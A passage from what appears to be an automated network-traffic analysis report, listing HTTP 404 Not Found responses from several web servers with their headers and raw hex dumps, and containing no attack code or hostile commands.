c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKZcO2J89AEJJw0Ufm75pQOh%2BrjIY4c86hyZGAVXvORG0uVRyqqwLdHkh0G6M5%2FsvuABLqkTeUdcUt7JZmDbw3kV%2Fg0c9bOJX%2FzP5GsoSMhJTSpJcJ0slBMPw7Vv2Y8aSpOo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59b0a8c0810ed-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118830&min_rtt=118830&rtt_var=59415&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZpPX3MVTEyrLZ1ZBb3%2Fite7QEnXTmOTiEgq842kYJGH%2BnHGJKJZzOoCQAj%2Ff9K2kZzKxBWDaVROEEKGf3d%2Fih4NQoy667gjFDKH9tB9lxWFLAbQrp9uFQNibggyg7cziV58D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59b1b2932233a-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119567&min_rtt=119567&rtt_var=59783&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3936&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sd8Ww%2FW%2BucYITL%2FryslLANlYgQjyfyCJmgA3YPhjuABM2oocNs8qU8cAnL0556n1TqBMKg6YIr0qdyw2ssVD0IgEHRsPK3lw9baQB8C37FpoQFgrSLziU4UdxGhJdImkybSy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59b2bbabe10ed-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118732&min_rtt=118732&rtt_var=59366&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:35 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:37 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:40 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:43 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:54:57 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:55:00 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:55:03 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:55:28 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:55:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 